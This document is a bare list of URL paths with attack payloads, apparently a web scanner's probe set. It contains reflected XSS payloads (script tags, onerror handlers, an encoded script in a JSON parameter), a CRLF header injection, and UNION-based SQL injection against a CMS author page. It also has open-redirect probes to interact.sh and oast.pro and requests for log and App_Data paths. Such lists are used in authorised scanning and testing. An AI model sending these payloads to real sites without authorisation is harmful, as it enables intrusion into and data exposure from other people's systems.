/index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/?xmlcontrol=body%20onload=alert(document.domain)
/go.php?http://interact.sh
/plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20crlfinjection=1
/index.php?m=search&c=index&a=initxqb4n<img%20src%3da%20onerror%3dalert(document.domain)>cu9rs&modelid=1&q=tes
/login/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
/mods/clansphere/lang_modvalidate.php?language=language&module=module%22></script><script>alert(document.domain)</script>
/index.php?m=user&c=Users&a=logout&referurl=https://interact.sh
/widgets/debug.php?a=<script>alert(document.domain)</script>
/plugins/web/service/search/auto-completion/domain/en.xml?q=adm
/loginsave.php?u=http://interact.sh
/author_posts.php?author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}}),1,1),NULL,NULL,NULL,NULL--%20-&p_id=1
/cms/author_posts.php?author=admin%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5({{num}}),1,1),NULL,NULL,NULL,NULL--%20-&p_id=1
/squid.svg?title=Not%20Found&text=This%20is%20not%20the%20page%20you%20are%20looking%20for!&background=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cimg%20src=%22&small
/default.aspx?years=http://oast.pro
/login.php?a=get_upload_list&c=Uploadimgnew&info=eyJudW0iOiIxXCI%2BPFNjUmlQdCA%2BYWxlcnQoZG9jdW1lbnQuZG9tYWluKTwvU2NSaVB0PiIsInNpemUiOiIyMDk3MTUyIiwiaW5wdXQiOiIiLCJmdW5jIjoiaGVhZF9waWNfY2FsbF9iYWNrIiwicGF0aCI6ImFsbGltZyIsImlzX3dhdGVyIjoiMSIsImFsZyI6IkhTMjU2In0&lang=cn&m=admin&unneed_syn=
/en/products?query=123
/shop.php?search=%22/%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/specification/report.php?q=%22%3E%3Cimg%20src=x%20onerror=prompt(document.domain)%3E
/App_Data/
/App_Plugins/
/storage/logs/web.log
